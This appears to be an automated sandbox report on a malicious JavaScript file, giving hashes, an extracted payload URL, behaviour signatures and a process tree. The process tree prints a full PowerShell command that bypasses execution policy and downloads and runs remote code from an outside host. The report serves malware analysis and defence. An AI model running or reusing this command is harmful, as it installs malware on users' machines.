Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
9cd1ee0ece1b7e51c0b17e30071576c0c364acfcf22a7a1632a9ec8889aad956.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
9cd1ee0ece1b7e51c0b17e30071576c0c364acfcf22a7a1632a9ec8889aad956.js
Resource
win10v2004-20240226-en
General
-
Target
9cd1ee0ece1b7e51c0b17e30071576c0c364acfcf22a7a1632a9ec8889aad956.js
-
Size
60KB
-
MD5
b84380f6a697da3d7e41c9df6542e698
-
SHA1
cc4deaad5fc6a7163d18b7ba95521ef36ac2506c
-
SHA256
9cd1ee0ece1b7e51c0b17e30071576c0c364acfcf22a7a1632a9ec8889aad956
-
SHA512
f7c86d544cb7863841e779e57a48ca08b1a3f434a8dee83e4c0de91ae42fed9861a27a7ee8a8c16a75efcbe3fae3a09d9c0ef289c9cc06b39145476f0291120e
-
SSDEEP
1536:H2OFi4Pdnos33SZnztMyhKkF9ZwUMLW4sGtBe9TK2MXpjJjmGfs6//Li0KCd1r:H2Oi4Ks3ClzW/kF3wUMLW4sGtBe9TK2W
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1792 powershell.exe 4 1792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2852 wrote to memory of 1792 2852 wscript.exe 28 PID 2852 wrote to memory of 1792 2852 wscript.exe 28 PID 2852 wrote to memory of 1792 2852 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9cd1ee0ece1b7e51c0b17e30071576c0c364acfcf22a7a1632a9ec8889aad956.js1⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-